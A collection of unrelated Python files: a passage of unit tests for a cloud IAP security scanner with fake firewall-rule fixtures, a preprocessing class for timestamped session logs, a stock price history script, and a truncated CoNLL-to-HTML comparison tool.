self.firewall_rules = {
# Doesn't apply because of IPProtocol mismatch.
'proto_mismatch': firewall_rule_type.FirewallRule(
project_id='foo',
firewall_rule_name='proto_mismatch',
firewall_rule_network='global/networks/default',
firewall_rule_source_tags=json.dumps(['proto_mismatch']),
firewall_rule_allowed=json.dumps([{
'IPProtocol': 'udp',
}]),
),
# Preempted by allow.
'deny_applies_all_preempted': firewall_rule_type.FirewallRule(
project_id='foo',
firewall_rule_name='deny_applies_all_preempted',
firewall_rule_priority=60000,
firewall_rule_network='global/networks/default',
firewall_rule_source_ranges=json.dumps(['applies_all']),
firewall_rule_denied=json.dumps([{
'IPProtocol': 'tcp',
}]),
),
# Applies to all ports, tags.
'applies_all': firewall_rule_type.FirewallRule(
project_id='foo',
firewall_rule_name='applies_all',
firewall_rule_network='global/networks/default',
firewall_rule_source_ranges=json.dumps(['10.0.2.0/24']),
firewall_rule_source_tags=json.dumps(['applies_all']),
firewall_rule_allowed=json.dumps([{
'IPProtocol': 'tcp',
}]),
),
# Applies to only port 8080.
'applies_8080': firewall_rule_type.FirewallRule(
project_id='foo',
firewall_rule_name='applies_8080',
firewall_rule_network='global/networks/default',
firewall_rule_source_tags=json.dumps(['applies_8080']),
firewall_rule_allowed=json.dumps([{
'IPProtocol': 'tcp',
'ports': [8080],
}]),
),
# Applies to a multi-port range.
'applies_8081_8083': firewall_rule_type.FirewallRule(
project_id='foo',
firewall_rule_name='applies_8081_8083',
firewall_rule_network='global/networks/default',
firewall_rule_source_tags=json.dumps(['applies_8081_8083']),
firewall_rule_allowed=json.dumps([{
'IPProtocol': 'tcp',
'ports': ['8081-8083'],
}]),
),
# Doesn't apply because of direction mismatch.
'direction': firewall_rule_type.FirewallRule(
project_id='foo',
firewall_rule_name='direction',
firewall_rule_direction='EGRESS',
firewall_rule_network='global/networks/default',
firewall_rule_source_tags=json.dumps(['direction']),
firewall_rule_allowed=json.dumps([{
'IPProtocol': 'tcp',
}]),
),
# Doesn't apply because of network mismatch.
'network': firewall_rule_type.FirewallRule(
project_id='foo',
firewall_rule_name='network',
firewall_rule_network='global/networks/social',
firewall_rule_source_tags=json.dumps(['network']),
firewall_rule_allowed=json.dumps([{
'IPProtocol': 'tcp',
}]),
),
# Doesn't apply because of tags.
'tag_mismatch': firewall_rule_type.FirewallRule(
project_id='foo',
firewall_rule_name='tag_mismatch',
firewall_rule_network='global/networks/default',
firewall_rule_source_tags=json.dumps(['tag_mismatch']),
firewall_rule_target_tags=json.dumps(['im_gonna_pop_some_tags']),
firewall_rule_allowed=json.dumps([{
'IPProtocol': 'tcp',
}]),
),
# Tag-specific rule *does* apply.
'tag_match': firewall_rule_type.FirewallRule(
project_id='foo',
firewall_rule_name='tag_match',
firewall_rule_network='global/networks/default',
firewall_rule_source_tags=json.dumps(['tag_match']),
firewall_rule_target_tags=json.dumps(['tag_i1']),
firewall_rule_allowed=json.dumps([{
'IPProtocol': 'tcp',
}]),
),
# Preempted by deny rule.
'preempted': firewall_rule_type.FirewallRule(
project_id='foo',
firewall_rule_name='preempted',
firewall_rule_network='global/networks/default',
firewall_rule_source_tags=json.dumps(['preempted']),
firewall_rule_allowed=json.dumps([{
'IPProtocol': 'tcp',
}]),
),
# Preempted by deny rule.
'preempted_deny': firewall_rule_type.FirewallRule(
project_id='foo',
firewall_rule_name='preempted_deny',
firewall_rule_priority=1,
firewall_rule_network='global/networks/default',
firewall_rule_source_ranges=json.dumps(['preempted']),
firewall_rule_denied=json.dumps([{
'IPProtocol': 'tcp',
}]),
),
}
self.instances = {
'i1': instance_type.Instance(
project_id='foo',
name='i1',
tags=json.dumps({'items': ['tag_i1']}),
zone='wl-redqueen1-a',
),
'i2': instance_type.Instance(
project_id='foo',
name='i2',
tags=json.dumps([]),
zone='wl-redqueen1-a',
),
}
self.instance_groups = {
# Managed
'ig_managed': instance_group_type.InstanceGroup(
project_id='foo',
name='ig_managed',
network='global/networks/default',
region='wl-redqueen1',
instance_urls=json.dumps(
[('https://www.googleapis.com/compute/v1/'
'projects/foo/zones/wl-redqueen1-a/instances/i1')]),
),
# Unmanaged; overrides port mapping
'ig_unmanaged': instance_group_type.InstanceGroup(
project_id='foo',
name='ig_unmanaged',
network='global/networks/default',
region='wl-redqueen1',
instance_urls=json.dumps([]),
named_ports=json.dumps(
[{'name': 'foo', 'port': 80},
{'name': 'http', 'port': 8080}]),
),
# Unmanaged; same instance as ig_managed
'ig_same_instance': instance_group_type.InstanceGroup(
project_id='foo',
name='ig_same_instance',
network='global/networks/default',
region='wl-redqueen1',
instance_urls=json.dumps(
[('https://www.googleapis.com/compute/v1/'
'projects/foo/zones/wl-redqueen1-a/instances/i1')]),
),
# Unmanaged; different network than ig_managed
'ig_different_network': instance_group_type.InstanceGroup(
project_id='foo',
name='ig_different_network',
network='global/networks/nondefault',
region='wl-redqueen1',
instance_urls=json.dumps(
[('https://www.googleapis.com/compute/v1/'
'projects/foo/zones/wl-redqueen1-a/instances/i1')]),
),
# Unmanaged; different instance than ig_managed
'ig_different_instance': instance_group_type.InstanceGroup(
project_id='foo',
name='ig5',
network='global/networks/default',
region='wl-redqueen1',
instance_urls=json.dumps(
[('https://www.googleapis.com/compute/v1/'
'projects/foo/zones/wl-redqueen1-a/instances/i2')]),
),
}
self.instance_group_managers = {
'igm1': instance_group_manager_type.InstanceGroupManager(
project_id='foo',
name='igm1',
instance_group=('https://www.googleapis.com/compute/v1/'
'projects/foo/regions/wl-redqueen1/instanceGroups/ig_managed'),
instance_template=('https://www.googleapis.com/compute/v1/'
'projects/foo/global/instanceTemplates/it1'),
region='wl-redqueen1',
),
}
self.instance_templates = {
'it1': instance_template_type.InstanceTemplate(
project_id='foo',
name='it1',
properties=json.dumps({
'tags': {'items': ['tag_it1']},
}),
),
}
self.data = iap_scanner._RunData(self.backend_services.values(),
self.firewall_rules.values(),
self.instances.values(),
self.instance_groups.values(),
self.instance_group_managers.values(),
self.instance_templates.values(),
)
def test_instance_template_map(self):
self.assertEqual(
{
self.instance_groups['ig_managed'].key: self.instance_templates['it1'],
},
self.data.instance_templates_by_group_key)
def test_find_instance_group(self):
self.assertEqual(self.instance_groups['ig_managed'],
self.data.find_instance_group_by_url(
'https://www.googleapis.com/compute/v1/'
'projects/foo/regions/wl-redqueen1/instanceGroups/ig_managed'))
def test_find_instance(self):
self.assertEqual(self.instances['i1'],
self.data.find_instance_by_url(
'https://www.googleapis.com/compute/v1/'
'projects/foo/zones/wl-redqueen1-a/instances/i1'))
def test_find_network_port(self):
self.assertEqual(
self.network_port(80),
self.data.instance_group_network_port(
self.backend_services['bs1'], self.instance_groups['ig_managed']))
# ig_unmanaged overrides port mapping, so it gets a different port number
self.assertEqual(
self.network_port(8080),
self.data.instance_group_network_port(
self.backend_services['bs1'], self.instance_groups['ig_unmanaged']))
def test_firewall_allowed_sources(self):
self.assertEqual(
set(['10.0.2.0/24', 'tag_match', 'applies_all']),
self.data.firewall_allowed_sources(self.network_port(80), 'tag_i1'))
self.assertEqual(
set(['10.0.2.0/24', 'tag_match', 'applies_all']),
self.data.firewall_allowed_sources(self.network_port(81), 'tag_i1'))
self.assertEqual(
set(['10.0.2.0/24', 'applies_all']),
self.data.firewall_allowed_sources(self.network_port(80), 'tag'))
self.assertEqual(
set(['10.0.2.0/24', 'applies_all']),
self.data.firewall_allowed_sources(self.network_port(8079), 'tag'))
self.assertEqual(
set(['10.0.2.0/24', 'applies_all', 'applies_8080']),
self.data.firewall_allowed_sources(self.network_port(8080), 'tag'))
self.assertEqual(
set(['10.0.2.0/24', 'applies_all', 'applies_8081_8083']),
self.data.firewall_allowed_sources(self.network_port(8081), 'tag'))
self.assertEqual(
set(['10.0.2.0/24', 'applies_all', 'applies_8081_8083']),
self.data.firewall_allowed_sources(self.network_port(8082), 'tag'))
self.assertEqual(
set(['10.0.2.0/24', 'applies_all', 'applies_8081_8083']),
self.data.firewall_allowed_sources(self.network_port(8083), 'tag'))
self.assertEqual(
set(['10.0.2.0/24', 'applies_all']),
self.data.firewall_allowed_sources(self.network_port(8084), 'tag'))
def test_tags_for_instance_group(self):
self.assertEqual(
set(['tag_i1', 'tag_it1']),
self.data.tags_for_instance_group(self.instance_groups['ig_managed']))
self.assertEqual(
set(),
self.data.tags_for_instance_group(self.instance_groups['ig_unmanaged']))
def test_retrieve_resources(self):
iap_resources = dict((resource.backend_service.key, resource)
for resource in self.scanner._retrieve()[0])
self.maxDiff = None
self.assertEquals(set([bs.key for bs in self.backend_services.values()]),
set(iap_resources.keys()))
self.assertEquals(
iap_scanner.IapResource(
backend_service=self.backend_services['bs1'],
alternate_services=set([
backend_service_type.Key.from_args(
project_id='foo',
name='bs1_same_backend',
),
backend_service_type.Key.from_args(
project_id='foo',
name='bs1_same_instance',
),
]),
direct_access_sources=set(['10.0.2.0/24',
'tag_match',
'applies_all',
'applies_8080']),
iap_enabled=True,
),
iap_resources[self.backend_services['bs1'].key])
@mock.patch(
'google.cloud.security.scanner.scanners.iap_scanner.datetime',
autospec=True)
@mock.patch(
'google.cloud.security.scanner.scanners.iap_scanner.notifier',
autospec=True)
@mock.patch.object(
iap_scanner.IapScanner,
'_upload_csv', autospec=True)
@mock.patch.object(
iap_scanner.csv_writer,
'write_csv', autospec=True)
@mock.patch.object(
iap_scanner.IapScanner,
'_output_results_to_db', autospec=True)
def test_run_scanner(self, mock_output_results, mock_csv_writer,
mock_upload_csv, mock_notifier, mock_datetime):
mock_datetime.utcnow = mock.MagicMock()
mock_datetime.utcnow.return_value = self.fake_utcnow
fake_csv_name = 'fake.csv'
fake_csv_file = type(
mock_csv_writer.return_value.__enter__.return_value)
fake_csv_file.name = fake_csv_name
self.scanner.run()
self.assertEquals(1, mock_output_results.call_count)
mock_upload_csv.assert_called_once_with(
self.scanner,
self.fake_scanner_configs.get('output_path'),
self.fake_utcnow,
fake_csv_name)
mock_csv_writer.assert_called_once_with(
data=[{'resource_id': None,
'rule_name': 'test',
'rule_index': 0,
'violation_data': {
'iap_enabled_violation': 'True',
'resource_name': 'bs1_different_port',
'alternate_services_violations': '',
'direct_access_sources_violations': ''},
'violation_type': 'IAP_VIOLATION',
'resource_type': 'backend_service'},
{'resource_id': None,
'rule_name': 'test',
'rule_index': 0,
'violation_data': {
'iap_enabled_violation': 'True',
'resource_name': 'bs1_different_network',
'alternate_services_violations': '',
'direct_access_sources_violations': ''},
'violation_type': 'IAP_VIOLATION',
'resource_type': 'backend_service'},
{'resource_id': None,
'rule_name': 'test',
'rule_index': 0,
'violation_data': {
'iap_enabled_violation': 'False',
'resource_name': 'bs1',
'alternate_services_violations': (
'foo/bs1_same_backend, foo/bs1_same_instance'),
'direct_access_sources_violations': (
'10.0.2.0/24, '
'applies_8080, '
'applies_all, '
'tag_match')},
'violation_type': 'IAP_VIOLATION',
'resource_type': 'backend_service'},
{'resource_id': None,
'rule_name': 'test',
'rule_index': 0,
'violation_data': {
'iap_enabled_violation': 'True',
'resource_name': 'bs1_different_instance',
'alternate_services_violations': '',
'direct_access_sources_violations': ''},
'violation_type': 'IAP_VIOLATION',
'resource_type': 'backend_service'},
{'resource_id': None,
'rule_name': 'test',
'rule_index': 0,
'violation_data': {
'iap_enabled_violation': 'True',
'resource_name': 'bs1_same_backend',
'alternate_services_violations': '',
'direct_access_sources_violations': ''},
'violation_type': 'IAP_VIOLATION',
'resource_type': 'backend_service'},
{'resource_id': None,
'rule_name': 'test',
'rule_index': 0,
'violation_data': {
'iap_enabled_violation': 'True',
'resource_name': 'bs1_same_instance',
'alternate_services_violations': '',
'direct_access_sources_violations': ''},
'violation_type': 'IAP_VIOLATION',
'resource_type': 'backend_service'}],
resource_name='violations',
write_header=True)
self.assertEquals(0, mock_notifier.process.call_count)
if __name__ == '__main__':
unittest.main()
|
"""Class holding all attributes related to preprocessing textFiles"""
# Change working directory to where this module is before doing anything else
import os, sys
os.chdir(os.path.dirname(os.path.abspath(sys.argv[0])))
import cfg
import os
import csv
import numpy as np
import collections
from datetime import datetime
import itertools
import csv
class PreprocessTextfiles:
# string constants that define textFile
seshStart_str = 'SeshStart'
seshEnd_str = 'SeshEnd'
seshStartTag_str = '0000000000'
seshEndTag_str = '0000000000'
def __init__(self):
self.binned_lines = None
# self.texts_not_imported = [texts_not_imported_col_condition,texts_not_imported_row_condition,texts_not_imported_row_condition]
self.texts_not_imported = None
self.txt_list = self.get_all_text_locs()
self.all_lines = self.get_all_lines_no_dupes(self.txt_list)
zipped = self.import_texts_to_list_of_mat(self.txt_list)
self.texts_imported = zip(*zipped)[1]
# Sort the lines
times = self.get_col(self.all_lines,cfg.TIME_COL)
self.all_lines = self.sort_X_BasedOn_Y_BeingSorted(self.all_lines,times)
# if an output_dir was specified, output a csv to it
self.output_all_lines_to_csv()
#self.textDict =self.importTextsToDict(self.txtList)
#self.lines_sorted = []
#for i in range(len(self.textDict.items())):
# self.linesSorted.extend(self.textDict.items()[i][1])
def output_all_lines_to_csv(self):
"""ouput all lines imported to a single csv"""
with open(cfg.OUTPUT_LOC+"\\all_lines.csv", "wb") as f:
writer = csv.writer(f)
writer.writerows(self.all_lines)
def sort_X_BasedOn_Y_BeingSorted(self,X,Y):
"""Sorts X based on the result from Y being sorted"""
X = np.array(X)
Y = np.array(Y)
inds = Y.argsort()
return(X[inds])
def get_col(self,list_of_lists,col_num):
"""return desired column from list of lists as a list"""
return list(np.asarray(list_of_lists)[:,col_num])
def get_all_text_locs(self):
"""Get a list of all text files in the given folder (including subdirectories)"""
txt_list = []
for root, dirs, files in os.walk(cfg.DIR_WITH_TEXTFILES):
for file in files:
if file.endswith(".txt"):
print(os.path.join(root, file))
txt_list.append(os.path.join(root, file))
# Remove all the paths that are subdirectories of the ignore folders
for i in range(len(cfg.FOLDERS_TO_IGNORE)):
txt_list=[x for x in txt_list if not (cfg.FOLDERS_TO_IGNORE[i] in x)]
return txt_list
def import_texts_to_list_of_mat(self,txtList):
"""Import viable text_files to a list of matrices
Returns:
[(lines_list,text_file_loc)] (tuple)
lines: The lines of the textfile as a 2D list
text_file_loc: The path of each textFile that was imported.
"""
lines_list = []
text_file_loc=[]
texts_not_imported_col_condition=[]
texts_not_imported_row_condition=[]
texts_not_imported_absolute_start_condition=[]
# Append them all into one matrix (the ones with the appropriate number of columns)
for i in range(len(txtList)):
text_file = txtList[i]
try:
with open(text_file) as f:
reader = csv.reader(f, delimiter="\t")
new_lines = list(reader)
print(str(len(new_lines))+" - "+text_file)
# Don't consider textfiles before specfied time
text_start_date = datetime.strptime(new_lines[0][cfg.DATE_COL], '%Y-%m-%d %H:%M:%S.%f')
if text_start_date > cfg.ABSOLUTE_START_TIME:
# Only consider textFile with more than 2 rows and that have 'SeshStart' in first line
if len(new_lines) > 2 and new_lines[0][cfg.ACTION_COL]==self.seshStart_str:
# Add a row for textFiles missing a SeshEnd
if new_lines[-1][cfg.ACTION_COL] != self.seshEnd_str:
new_lines.append(new_lines[-1][:])
new_lines[-1][cfg.ACTION_COL] = self.seshEnd_str
new_lines[-1][cfg.TAG_COL] = self.seshEndTag_str
lines_list.append(new_lines)
text_file_loc.append(txtList[i])
else:
print("Text file does not have enough rows - "+text_file)
texts_not_imported_row_condition.append(text_file)
else:
print("Text file was taken too early - "+text_file)
texts_not_imported_absolute_start_condition.append(text_file)
except BaseException:
print("Text file does not have enough columns - "+text_file)
texts_not_imported_col_condition.append(text_file)
self.texts_not_imported = [texts_not_imported_col_condition,texts_not_imported_row_condition,texts_not_imported_absolute_start_condition]
# Sort the text file contents and names by startSeshes
startSeshes = []
for i in range(len(lines_list)):
startSeshes.append(lines_list[i][0][cfg.TIME_COL])
print(startSeshes[0:5])
print(text_file_loc[0:5])
print(lines_list[0:5])
text_file_loc = self.sort_X_BasedOn_Y_BeingSorted(text_file_loc,startSeshes)
lines_list = self.sort_X_BasedOn_Y_BeingSorted(lines_list,startSeshes)
print(text_file_loc[0:5])
print(lines_list[0:5])
return(zip(lines_list,text_file_loc))
def get_all_lines_no_dupes(self,txt_list):
"""Returns a list of lists that contains all lines from all text files in txt_list with duplicates removed"""
list_of_Mat = self.import_texts_to_list_of_mat(txt_list)
lines_list = zip(*list_of_Mat)[0]
lines_list = list(itertools.chain.from_iterable(lines_list))
lines_list = [list(x) for x in set(tuple(x) for x in lines_list)]
return lines_list
def eAnd(self,*args):
"""Returns a list that is the element-wise 'and' operation along each index of each list in args"""
return [all(tuple) for tuple in zip(*args)]
def set_bins(self):
"""
Bin list of all sorted lines_list into per binTime lists
For your convenience: there are 86400 seconds in a day
Returns: BinnedList: np.array([[a],[b]...]) where the first line in a,b... is binTime seconds before the last
"""
all_lines = self.all_lines
column_of_times = self.get_col(all_lines,cfg.TIME_COL)
column_of_times = [ float(x) for x in column_of_times]
column_of_times = np.array(column_of_times)
all_lines = np.array(all_lines)
binned_lines = []
start_ind = column_of_times[0]
end_ind = start_ind + cfg.BIN_TIME
while end_ind <= column_of_times[len(column_of_times)-1]:
the_bin = all_lines[np.array(self.eAnd(column_of_times>=start_ind,column_of_times<end_ind))]
binned_lines.append(the_bin)
start_ind = end_ind
end_ind = end_ind + cfg.BIN_TIME
print('bin created from ' + str(start_ind) + ' to ' + str(end_ind))
self.binned_lines = binned_lines
#
# def get_col_binned_lines(self,binned_lines,col_num):
# """return list of lists that would be the binned lists of a particular column"""
# if self.binned_lines == None:
# assert(1==0,'binned_lines have not been set')
# binned_lines_col = []
# for lines_list in self.binned_lines:
# if len(lines_list) > 0:
# binned_lines_col.append(self.get_col(lines_list,col_num))
# return binned_lines_col
#
# def get_binned_rows_tag(self,binned_lines,chosen_tags):
# """return list of lists that are all binned lines that are by a mouse in tags """
# if self.binned_lines == None:
# assert(1==0,'binned_lines have not been set')
# binned_lines_tags = []
#
# for lines_list in self.binned_lines:
# the_bin = []
# for line in lines_list:
# if int(line[cfg.TAG_COL]) in chosen_tags:
# the_bin.append(line)
# binned_lines_tags.append(the_bin)
# return binned_lines_tags
#
# def get_freq_list_binned(self,binned_lines,item,col_num):
# """return list of list that is the count of the occurence of 'item' in each list (in column col_num) in binned_lines"""
# if self.binned_lines == None:
# assert(1==0,'binned_lines have not been set')
# freqs = []
#
# chosen_col = self.get_col_binned_lines(self.binned_lines,col_num)
# for its in chosen_col:
# freqs.append(its.count(item))
# return freqs
#
# def find_freqs_for_each(self,item,col_num,chosen_tags):
# """return list of list that is the counts of item for each chosen mouse for each bin in col_num"""
# if self.binned_lines == None:
# assert(1==0,'binned_lines have not been set')
# freqs_for_each = []
# for lines_list in self.binned_lines:
# freqs_for_bin = []
# for tag in chosen_tags:
# tag_rows_bin = self.get_binned_rows_tag([lines_list],[tag])
# #tag_rows_bin = self.get_binned_rows_tag([tag])
# if len( tag_rows_bin[0]) == 0:
# freqs_for_bin.append(0)
# else:
# freqs_for_bin.append(self.get_freq_list_binned(tag_rows_bin,item,col_num)[0])
# #freqs_for_bin.append(self.get_freq_list_binned(item,col_num)[0])
# freqs_for_each.append(freqs_for_bin)
# return freqs_for_each
###################################
def get_col_binned_lines(self,binned_lines,col_num):
"""return list of lists that would be the binned lists of a particular column"""
if self.binned_lines == None:
assert(1==0,'binned_lines have not been set')
binned_lines_col = []
for lines_list in binned_lines:
if len(lines_list) > 0:
binned_lines_col.append(self.get_col(lines_list,col_num))
return binned_lines_col
def get_binned_rows_tag(self,binned_lines,chosen_tags):
"""return list of lists that are all binned lines that are by a mouse in tags """
if self.binned_lines == None:
assert(1==0,'binned_lines have not been set')
binned_lines_tags = []
for lines_list in binned_lines:
the_bin = []
for line in lines_list:
if int(line[cfg.TAG_COL]) in chosen_tags:
the_bin.append(line)
binned_lines_tags.append(the_bin)
return binned_lines_tags
def get_freq_list_binned(self,binned_lines,item,col_num):
"""return list of list that is the count of the occurence of 'item' in each list (in column col_num) in binned_lines"""
if self.binned_lines == None:
assert(1==0,'binned_lines have not been set')
freqs = []
chosen_col = self.get_col_binned_lines(binned_lines,col_num)
for its in chosen_col:
freqs.append(its.count(item))
return freqs
def find_freqs_for_each(self,item,col_num,chosen_tags):
"""return list of list that is the counts for each mouse for each bin for item in col_num"""
if self.binned_lines == None:
assert(1==0,'binned_lines have not been set')
freqs_for_each = []
for lines_list in self.binned_lines:
freqs_for_bin = []
for tag in chosen_tags:
tag_rows_bin = self.get_binned_rows_tag([lines_list],[tag])
if len( tag_rows_bin[0]) == 0:
freqs_for_bin.append(0)
else:
freqs_for_bin.append(self.get_freq_list_binned(tag_rows_bin,item,col_num)[0])
freqs_for_each.append(freqs_for_bin)
return freqs_for_each
#test = PreprocessTextfiles()
# def setDuplicates(self,lines_list,textFileLoc):
# """Return a tuple of text file locations and their startSeshes that have been identified as duplicates,
# ordered by StartSesh"""
# # Remove the text files that have the same start time as another
# startSeshes = []
# for i in range(len(lines_list)):
# startSeshes.append(lines_list[i][0][self.timeCol])
#
# def equalToAnother(elem):
# return (startSeshes.count(elem) > 1)
#
# def NOTequalToAnother(elem):
# return (startSeshes.count(elem) == 1)
#
# # Indices of all text files that are duplicates of another and those that are unique
# equalStartInd=map(equalToAnother,startSeshes)
# notEqualStartInd = map(NOTequalToAnother, startSeshes)
#
# # Retrieve text file names and start times that have duplicates
# textFileEquals=np.asarray(textFileLoc)[np.asarray(equalStartInd)]
# startTimeEquals=np.asarray(startSeshes)[np.asarray(equalStartInd)]
#
# # Sort these text files by start time
# textFileEquals = self.sort_X_BasedOn_Y_BeingSorted(textFileEquals,startTimeEquals)
# startTimeEquals = self.sort_X_BasedOn_Y_BeingSorted(startTimeEquals,startTimeEquals)
#
# self.duplicates = zip(textFileEquals,startTimeEquals)
#
# def setDuplicatesThatWereKept(self):
# if self.duplicates == None:
# assert(1==0,'No duplicates have been set')
# textFileEquals = zip(*self.duplicates)[0]
# startTimeEquals = zip(*self.duplicates)[1]
#
# textFileEqualsOnlyOne = [] # you are the only one baby!
# startTimeEqualsOnlyOne = []
# # Create a list that only contains one (any one) of the textFiles that have a duplicate
# for i in range(len(startTimeEquals)):
# if i != range(len(startTimeEquals))[-1]:
# if startTimeEquals[i] != startTimeEquals[i+1]:
# startTimeEqualsOnlyOne.append(startTimeEquals[i])
# textFileEqualsOnlyOne.append(textFileEquals[i])
# else:
# startTimeEqualsOnlyOne.append(startTimeEquals[i])
# textFileEqualsOnlyOne.append(textFileEquals[i])
#
# self.duplicatesKept = zip(textFileEqualsOnlyOne,startTimeEqualsOnlyOne)
#
#
# def importTextsToDict(self,txtList):
# """
# Return a dictionary that has each path of each text file as the key to a matrix that contains all the lines_list of each text file
# - duplicates removed, ordered by textFile startseshes
# """
# workingDir = self.workingDir
# txtList = self.getAllTextLocs(workingDir)
# # Remove all the paths that are subdirectories of the ignore folders
# for i in range(len(self.foldersToIgnore)):
# txtList=[x for x in txtList if not (self.foldersToIgnore[i] in x)]
#
# # lines_list contains the lines_list from each text file where lines_list[i] contains all the lines_list of the i'th text file
# ListofMat=self.importTextsToListofMat(txtList)
# lines_list = zip(*ListofMat)[0]
# textFileLoc = zip(*ListofMat)[1]
#
# if self.duplicates == None:
# self.setDuplicates(lines_list,textFileLoc)
# self.setDuplicatesThatWereKept()
#
# ######
# ## Remove the text files that have the same start time as another
# #startSeshes = []
# #for i in range(len(lines_list)):
# # startSeshes.append(lines_list[i][0][self.timeCol])
# #
# #def equalToAnother(elem):
# # return (startSeshes.count(elem) > 1)
# #
# #def NOTequalToAnother(elem):
# # return (startSeshes.count(elem) == 1)
# #
# ## Indices of all text files that are duplicates of another and those that are unique
# #equalStartInd=map(equalToAnother,startSeshes)
# #notEqualStartInd = map(NOTequalToAnother, startSeshes)
# #
# ## Retrieve text file names and start times that have duplicates
# #textFileEquals=np.asarray(textFileLoc)[np.asarray(equalStartInd)]
# #startTimeEquals=np.asarray(startSeshes)[np.asarray(equalStartInd)]
# #
# #
# ## Sort these text files by start time
# #textFileEquals = self.sort_X_BasedOn_Y_BeingSorted(textFileEquals,startTimeEquals)
# #startTimeEquals = self.sort_X_BasedOn_Y_BeingSorted(startTimeEquals,startTimeEquals)
# ######
#
# #textFileEqualsOnlyOne = [] # you are the only one baby!
# #startTimeEqualsOnlyOne = []
# ## Create a list that only contains one (any one) of the textFiles that have a duplicate
# #for i in range(len(startTimeEquals)):
# # if i != range(len(startTimeEquals))[-1]:
# # if startTimeEquals[i] != startTimeEquals[i+1]:
# # startTimeEqualsOnlyOne.append(startTimeEquals[i])
# # textFileEqualsOnlyOne.append(textFileEquals[i])
# # else:
# # startTimeEqualsOnlyOne.append(startTimeEquals[i])
# # textFileEqualsOnlyOne.append(textFileEquals[i])
#
#
# #notEqualStartInd = map(NOTequalToAnother, startSeshes)
#
#
# ###
# # Remove all the text files that have a duplicate (another text file with identical startSesh)
# # notEqualStartInd - indices of all text files that have unique startSeshes
# #lines_list = np.asarray(lines_list)[np.asarray(notEqualStartInd)]
# #lines_list = lines_list.tolist()
# #textFileLoc = np.asarray(textFileLoc)[np.asarray(notEqualStartInd)]
# #textFileLoc = textFileLoc.tolist()
# #startSeshes = np.asarray(startSeshes)[np.asarray(notEqualStartInd)]
# #startSeshes = startSeshes.tolist()
# ###
#
# # Remove all the text files that have a duplicate (another text file with identical startSesh)
# textFileEquals = zip(*self.duplicates)[0]
# startTimeEquals = zip(*self.duplicates)[1]
# lines_list = [line for line in lines_list if line[0][self.timeCol] in startTimeEquals]
# textFileLoc = [textF for textF in textFileLoc if textF in textFileEquals]
#
# assert(len(lines_list)==len(textFileLoc))
#
#
# # Right, and now add only one of each of the duplicates back to 'lines_list'
# #[linesOneDup,textFileLocOneDup]=importTextsToListofMat(textFileEqualsOnlyOne)
# textFileEqualsOnlyOne = zip(*self.duplicatesKept)[0]
# ListofMat=self.importTextsToListofMat(textFileEqualsOnlyOne)
# linesOneDup = zip(*ListofMat)[0]
# textFileLocOneDup = zip(*ListofMat)[1]
#
# for linesToAdd in linesOneDup:
# lines_list.append(linesToAdd)
# for locToAdd in textFileLocOneDup:
# textFileLoc.append(locToAdd)
#
# # Sort the text file contents and names by startSeshes
# startSeshes = []
# for i in range(len(lines_list)):
# startSeshes.append(lines_list[i][0][self.timeCol])
# textFileLoc = self.sort_X_BasedOn_Y_BeingSorted(textFileLoc,startSeshes)
# lines_list = self.sort_X_BasedOn_Y_BeingSorted(lines_list,startSeshes)
#
# # Add these two to a dictionary
# textDict = collections.OrderedDict(zip(textFileLoc, lines_list))
# return textDict
#
#
#
#
# def convertToUsefulDate(self,DateList):
# """returns a list of dates converted to date objects"""
# DateList_pr = DateList[:]
# # Convert dates to date objects that are useable
# for i in range(len(DateList_pr)):
# DateList_pr[i]=(datetime.strptime(DateList[i], '%Y-%m-%d %H:%M:%S.%f'))
# return DateList_pr
#
#
#
|
import csv
import os
import z
import update_history
def setlistofstocks():
path = z.getPath("historical")
listOfFiles = os.listdir(path)
stocks = list()
for entry in listOfFiles:
# cpath = "{}/{}".format(path, entry)
astock = os.path.splitext(entry)[0]
stocks.append(astock)
z.setp(stocks, "listofstocks")
# process(astock, cpath)
# for row in csv.DictReader(open(cpath)):
# pass
# getPrice.latest[astock] = ( float(row['Open']), float(row[closekey]) )
def process(astock, path):
print("astock : {}".format( astock ))
reader = csv.DictReader(open(path))
cyear = None
for row in reader:
date = row['Date']
year = date.split("-")[0]
if cyear != year:
tpath = z.getPath("split/{}/{}_{}.csv".format(astock[0], astock, year))
writer = csv.DictWriter(open(tpath, "w"), fieldnames=reader.fieldnames)
writer.writeheader()
cyear = year
writer.writerow(row)
def num_of_days_checks():
stocks = z.getp("listofstocks")
for astock in stocks:
path = z.getCsvPath(astock)
i = 0
for row in csv.DictReader(open(path)):
i += 1
if i < 218:
print("astock: {} {} ".format( astock, i))
def listofs():
stocks = z.getp("listofstocks")
etfs = z.getEtfList()
listofs = list()
for astock in stocks:
if astock in etfs:
continue;
listofs.append(astock)
z.setp(listofs, "listofs")
#listofs()
#exit()
if __name__ == '__main__':
# problems = z.getp("problems")
problems = []
for astock in problems:
if astock == "BRKB":
continue
df = update_history.getDataFromYahoo(astock, "2013-01-02")
if df is None:
print("astock : {}".format( astock ))
continue
path = z.getPath("historical/{}.csv".format(astock))
with open(path, "a") as f:
for i,idx in enumerate(df.index):
if i == 0:
f.write("Date,Open,High,Low,Close,Adj Close,Volume\n")
cdate = str(idx.to_pydatetime()).split(" ")[0]
opend = df.at[idx, "Open"]
high = df.at[idx, "High"]
low = df.at[idx, "Low"]
closed = df.at[idx, "Close"]
adj = df.at[idx, "Adj Close"]
vol = df.at[idx, "Volume"]
added = True
f.write("{},{},{},{},{},{},{}\n".format(cdate, opend, high, low, closed, adj, vol))
print("path : {}".format( path ))
process(astock, path)
setlistofstocks()
import prob_down_5_years
prob_down_5_years.prob()
import gained_discount
gained_discount.dosomething()
gained_discount.genUlt()
# num_of_days_checks()
# path = z.getPath("historical/KO.csv")
# process("KO", path)
|
import argparse
import pyconll
document_start = """
<html>
<head>
<style>
.C {color:red;}
.E {color:blue;}
.sent {border: 1px solid; margin-bottom:10px}
</style>
</head>
<body>"""
document_end = """
</body>
</html>"""
def read_conll(file_name):
data = pyconll.load_from_file(file_name)
tags = [
[
"<span class='" + (token.upos if token.upos in ["C", "E"] else "O") + "'>" + token.form + "</span>"
for token in sent
]
for sent in data
]
return tags
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-g', type=str, dest="gold", required=True, help= 'gold filename')
parser.add_argument('-p', type=str, dest="pred", required=True, help= 'predicted filename')
parser.add_argument('-o', type=str, dest="out", required=True, help= 'output html')
args = parser.parse_args()
gold = read_conll(args.gold)
pred = read_conll(args.pred)
document = document_start
for g_s, p_s in zip(gold, pred):
document += "<div class='sent'>"
document += "<div>" + " ".join(g_s) + "</div>"
document += "<div>" + " ".join(p_s) + "</div>"
